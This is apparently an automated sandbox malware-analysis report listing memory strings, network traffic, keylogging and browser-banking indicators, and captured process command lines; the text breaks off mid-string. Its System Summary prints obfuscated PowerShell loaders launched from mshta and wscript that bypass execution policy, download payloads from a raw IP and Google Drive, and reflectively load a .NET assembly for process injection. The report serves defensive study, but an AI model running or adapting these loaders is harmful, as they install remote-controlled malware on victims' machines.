              Source: powershell.exe, 0000000A.00000002.1700233165.0000000005A69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 0000000A.00000002.1700233165.0000000005A69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 0000000A.00000002.1697699849.0000000000820000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1699464500.0000000000C20000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1700233165.0000000004A01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.goo
              Source: powershell.exe, 0000000A.00000002.1700233165.0000000004B58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
              Source: powershell.exe, 0000000A.00000002.1700233165.0000000004C56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
              Source: powershell.exe, 0000000A.00000002.1700233165.0000000004C6C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1700233165.0000000004C70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download
              Source: explorer.exe, 00000013.00000003.1990810221.0000000002D47000.00000004.00000020.00020000.00000000.sdmp, 5BA1.tmp.19.drString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: explorer.exe, 00000013.00000003.1990810221.0000000002D47000.00000004.00000020.00020000.00000000.sdmp, 5BA1.tmp.19.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: explorer.exe, 00000013.00000003.1990810221.0000000002D47000.00000004.00000020.00020000.00000000.sdmp, 5BA1.tmp.19.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: explorer.exe, 0000000E.00000003.2159660741.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1761907243.000000000D1B6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.comE
              Source: powershell.exe, 0000000A.00000002.1700233165.0000000004B58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1697699849.00000000008FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000001.00000002.1442591521.00000000050B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15G9PH.img
              Source: explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hJkDs.img
              Source: explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
              Source: powershell.exe, 00000001.00000002.1451121837.0000000007451000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com64/WindowsPowerShell/v1.0/
              Source: powershell.exe, 00000001.00000002.1448623552.0000000005A1B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1328341542.00000000060AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1700233165.0000000005A69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: explorer.exe, 0000000E.00000003.2159660741.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1761907243.000000000D1B6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.comNaP0B
              Source: explorer.exe, 0000000E.00000003.2159660741.000000000D0B8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1761907243.000000000CFF4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcemberZ
              Source: explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
              Source: explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
              Source: explorer.exe, 0000000E.00000003.2159424837.0000000009730000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1755609685.0000000009730000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/bat
              Source: explorer.exe, 0000000E.00000003.2159660741.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1761907243.000000000D1B6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com576
              Source: explorer.exe, 00000013.00000003.1990810221.0000000002D47000.00000004.00000020.00020000.00000000.sdmp, 5BA1.tmp.19.drString found in binary or memory: https://www.ecosia.org/newtab/
              Source: explorer.exe, 00000013.00000003.1990810221.0000000002D47000.00000004.00000020.00020000.00000000.sdmp, 5BA1.tmp.19.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/health/wellness/7-secrets-to-a-happy-old-age-backed-by-science/ss-AA1hwpvW
              Source: explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
              Source: explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/companies/legacy-park-auction-canceled-liquidation-proposed-here-s-w
              Source: explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
              Source: explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/realestate/my-husband-and-i-paid-off-our-mortgage-more-than-15-years
              Source: explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/crime/bar-fight-leaves-man-in-critical-condition-suspect-arrested-in-
              Source: explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/crime/one-dead-several-wounded-after-drive-by-shootings-in-south-la/a
              Source: explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/opinion/decline-of-decorum-21-essential-manners-today-s-parents-fail-
              Source: explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/california-workers-will-get-five-sick-days-instead-of-three-
              Source: explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/pastor-of-atlanta-based-megachurch-faces-backlash-after-controv
              Source: explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/ukraine-live-briefing-biden-does-worry-house-drama-will-impact-
              Source: explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve
              Source: explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
              Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
              Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.10:49772 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.10:49778 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Source: Yara matchFile source: 00000018.00000002.2534825073.0000000002A21000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000002.2534653037.0000000000141000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3108, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 4072, type: MEMORYSTR
              Source: Yara matchFile source: 13.2.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000E.00000002.2537564234.0000000002491000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.1778514490.0000000000DB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.1779109929.0000000002791000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 30_2_0015162B GetKeyboardState,ToUnicode,30_2_0015162B

              E-Banking Fraud

              barindex
              Source: C:\Windows\SysWOW64\explorer.exeCode function: StrStrIA, chrome.exe|opera.exe|msedge.exe22_2_02C22EA8
              Source: C:\Windows\SysWOW64\explorer.exeCode function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep, firefox.exe22_2_02C23862
              Source: C:\Windows\SysWOW64\explorer.exeCode function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep, iexplore.exe22_2_02C23862
              Source: C:\Windows\SysWOW64\explorer.exeCode function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep, microsoftedgecp.exe22_2_02C23862
              Source: C:\Windows\SysWOW64\explorer.exeCode function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep, chrome.exe22_2_02C23862

              System Summary

              barindex
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTEM32\wIndowSpOWersHELl\v1.0\powerShELl.ExE" "pOWErSHell -Ex BypAsS -nOp -w 1 -c dEvicECrEDeNtIaldePLoyMenT.EXe ; iex($(IeX('[systEm.TeXt.eNcoDINg]'+[CHaR]58+[Char]0X3a+'utf8.geTsTRinG([sySteM.COnvErT]'+[CHar]58+[cHAr]58+'frOMBaSE64StRING('+[cHaR]34+'JDVnZ0U5NiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRW1iRXJERUZJbmlUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXUnQsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3d3osc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRXdqWU8sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcVN5cHZwZixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9vUGdpWGNPayk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJyIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWNremRUWnd6ZCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDVnZ0U5Njo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTM1LjE2Ni82MDAvc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbnN0b2ViZS50SUYiLCIkZU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMiLDAsMCk7c1RBUnQtc0xlRVAoMyk7c1RBcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMi'+[cHAr]34+'))')))"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BypAsS -nOp -w 1 -c dEvicECrEDeNtIaldePLoyMenT.EXe
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4ICggKCgnaHl4aW1hZ2VVcmwgPSBRTGVodHRwczovL2RyaXZlLmdvbycrJ2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciBRTGU7aHl4d2ViQ2xpZW50ID0gTmV3LU9iJysnamVjdCAnKydTeXN0ZScrJ20uTmV0LldlYkNsaWUnKydudDtoeXhpbWFnZUJ5dGVzID0gaHl4d2ViQ2xpZW50LkRvdycrJ25sb2FkRCcrJ2F0YShoeXhpbWFnZVVybCk7aHl4aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoaHl4aW1hZ2VCeXRlcyk7aHl4c3RhcnRGbGFnID0gUUxlPDxCQVNFNicrJzRfU1RBUlQ+PlFMZTtoeXhlbmRGbGFnID0gUUxlPDxCQVNFNjRfRU5EPj5RTGU7aHl4c3RhcnRJbmRleCA9IGh5eGltJysnYWdlVGV4dC5JbmRleE9mKGh5eHN0YXJ0RmxhZyk7aHl4ZW5kSW5kZXggPSBoeXhpbWFnZVRleHQuSW5kZXhPZihoeXhlbmRGbGFnKTtoeXhzdGFydEluZGV4IC1nZSAwIC1hbmQgaHl4ZW5kSW5kZXggLWd0IGh5eHN0YXJ0SW5kZXg7aHl4c3RhcnRJbmRleCArPSBoeXhzdGFydEZsYWcuTGVuZ3RoO2h5eGJhc2U2NExlbmd0aCA9IGh5eGVuZEknKyduZGV4IC0gaHl4c3RhcnRJbmRleDtoeXhiJysnYXNlNjRDb21tYW5kID0gaHl4aW1hZ2VUZXh0LlN1YnN0cmluZyhoeXhzdGFydEluZGV4LCBoeXhiYXNlNjRMZW5ndGgpO2h5eGJhc2U2NFJldmVyc2VkID0gLWpvaW4gKGh5eGJhJysnc2U2NENvbW1hbmQuVG9DaGEnKydyQXJyYXkoKSBWSjkgRm9yRWFjaC1PYmplY3QgeyBoeXhfIH0pWy0xJysnLi4tKGh5eGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07aHl4Y29tbWFuZEJ5dCcrJ2VzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhoeXhiYXNlNjRSZXZlcnNlZCk7aHl4bG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHknKyddOjpMb2FkKCcrJ2h5eGNvbW1hbmRCeXRlJysncyk7aHl4dmFpTWV0aG9kID0gW2QnKydubGliLklPLkhvbWVdLkdldE1ldGgnKydvZChRTGVWQUlRTGUpO2h5eHZhaU1ldGhvZC5JbnZva2UoaHl4bnVsbCwgQChRTGV0eHQuRUVDRlJFLzAwNi82NjEuNTMxLjU0Mi4yNzEvLzpwdHRoUUxlLCBRTGVkZXNhdGl2YWRvUUxlLCBRTGVkZXNhdGl2YWQnKydvUUxlJysnLCBRTGVkZXNhdGl2YWRvUUxlLCBRTGVhc3AnKyduZXRfcmVnYnJvd3NlcnNRTGUsIFFMZWRlc2F0aXZhZG9RTGUsIFFMZWRlc2F0aXZhZG9RTGUsUUxlZGVzYXRpdmFkb1FMZSxRTGVkZXNhdGl2YWRvUUxlLFFMZWRlJysnc2F0JysnaXZhZG9RTGUsUUxlZGVzYXRpJysndmFkb1FMZSxRTGVkZXNhdGl2YWRvUUxlLFFMZTFRTGUsUUxlZGVzYXRpdmFkb1FMZSkpOycpLWNyRXBMQUNFICAoW2NoQXJdMTA0K1tjaEFyXTEyMStbY2hBcl0xMjApLFtjaEFyXTM2ICAtckVQTGFDZShbY2hBcl04MStbY2hBcl03NitbY2hBcl0xMDEpLFtjaEFyXTM5IC1yRVBMYUNlJ1ZKOScsW2NoQXJdMTI0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex ( (('hyximageUrl = QLehttps://drive.goo'+'gle.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur QLe;hyxwebClient = New-Ob'+'ject '+'Syste'+'m.Net.WebClie'+'nt;hyximageBytes = hyxwebClient.Dow'+'nloadD'+'ata(hyximageUrl);hyximageText = [System.Text.Encoding]::UTF8.GetString(hyximageBytes);hyxstartFlag = QLe<<BASE6'+'4_START>>QLe;hyxendFlag = QLe<<BASE64_END>>QLe;hyxstartIndex = hyxim'+'ageText.IndexOf(hyxstartFlag);hyxendIndex = hyximageText.IndexOf(hyxendFlag);hyxstartIndex -ge 0 -and hyxendIndex -gt hyxstartIndex;hyxstartIndex += hyxstartFlag.Length;hyxbase64Length = hyxendI'+'ndex - hyxstartIndex;hyxb'+'ase64Command = hyximageText.Substring(hyxstartIndex, hyxbase64Length);hyxbase64Reversed = -join (hyxba'+'se64Command.ToCha'+'rArray() VJ9 ForEach-Object { hyx_ })[-1'+'..-(hyxbase64Command.Length)];hyxcommandByt'+'es = [System.Convert]::FromBase64String(hyxbase64Reversed);hyxloadedAssembly = [System.Reflection.Assembly'+']::Load('+'hyxcommandByte'+'s);hyxvaiMethod = [d'+'nlib.IO.Home].GetMeth'+'od(QLeVAIQLe);hyxvaiMethod.Invoke(hyxnull, @(QLetxt.EECFRE/006/661.531.542.271//:ptthQLe, QLedesativadoQLe, QLedesativad'+'oQLe'+', QLedesativadoQLe, QLeasp'+'net_regbrowsersQLe, QLedesativadoQLe, QLedesativadoQLe,QLedesativadoQLe,QLedesativadoQLe,QLede'+'sat'+'ivadoQLe,QLedesati'+'vadoQLe,QLedesativadoQLe,QLe1QLe,QLedesativadoQLe));')-crEpLACE ([chAr]104+[chAr]121+[chAr]120),[chAr]36 -rEPLaCe([chAr]81+[chAr]76+[chAr]101),[chAr]39 -rEPLaCe'VJ9',[chAr]124))"
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTEM32\wIndowSpOWersHELl\v1.0\powerShELl.ExE" "pOWErSHell -Ex BypAsS -nOp -w 1 -c dEvicECrEDeNtIaldePLoyMenT.EXe ; iex($(IeX('[systEm.TeXt.eNcoDINg]'+[CHaR]58+[Char]0X3a+'utf8.geTsTRinG([sySteM.COnvErT]'+[CHar]58+[cHAr]58+'frOMBaSE64StRING('+[cHaR]34+'JDVnZ0U5NiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRW1iRXJERUZJbmlUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXUnQsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3d3osc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRXdqWU8sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcVN5cHZwZixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9vUGdpWGNPayk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJyIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWNremRUWnd6ZCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDVnZ0U5Njo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTM1LjE2Ni82MDAvc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbnN0b2ViZS50SUYiLCIkZU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMiLDAsMCk7c1RBUnQtc0xlRVAoMyk7c1RBcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMi'+[cHAr]34+'))')))"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BypAsS -nOp -w 1 -c dEvicECrEDeNtIaldePLoyMenT.EXeJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4ICggKCgnaHl4aW1hZ2VVcmwgPSBRTGVodHRwczovL2RyaXZlLmdvbycrJ2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciBRTGU7aHl4d2ViQ2xpZW50ID0gTmV3LU9iJysnamVjdCAnKydTeXN0ZScrJ20uTmV0LldlYkNsaWUnKydudDtoeXhpbWFnZUJ5dGVzID0gaHl4d2ViQ2xpZW50LkRvdycrJ25sb2FkRCcrJ2F0YShoeXhpbWFnZVVybCk7aHl4aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoaHl4aW1hZ2VCeXRlcyk7aHl4c3RhcnRGbGFnID0gUUxlPDxCQVNFNicrJzRfU1RBUlQ+PlFMZTtoeXhlbmRGbGFnID0gUUxlPDxCQVNFNjRfRU5EPj5RTGU7aHl4c3RhcnRJbmRleCA9IGh5eGltJysnYWdlVGV4dC5JbmRleE9mKGh5eHN0YXJ0RmxhZyk7aHl4ZW5kSW5kZXggPSBoeXhpbWFnZVRleHQuSW5kZXhPZihoeXhlbmRGbGFnKTtoeXhzdGFydEluZGV4IC1nZSAwIC1hbmQgaHl4ZW5kSW5kZXggLWd0IGh5eHN0YXJ0SW5kZXg7aHl4c3RhcnRJbmRleCArPSBoeXhzdGFydEZsYWcuTGVuZ3RoO2h5eGJhc2U2NExlbmd0aCA9IGh5eGVuZEknKyduZGV4IC0gaHl4c3RhcnRJbmRleDtoeXhiJysnYXNlNjRDb21tYW5kID0gaHl4aW1hZ2VUZXh0LlN1YnN0cmluZyhoeXhzdGFydEluZGV4LCBoeXhiYXNlNjRMZW5ndGgpO2h5eGJhc2U2NFJldmVyc2VkID0gLWpva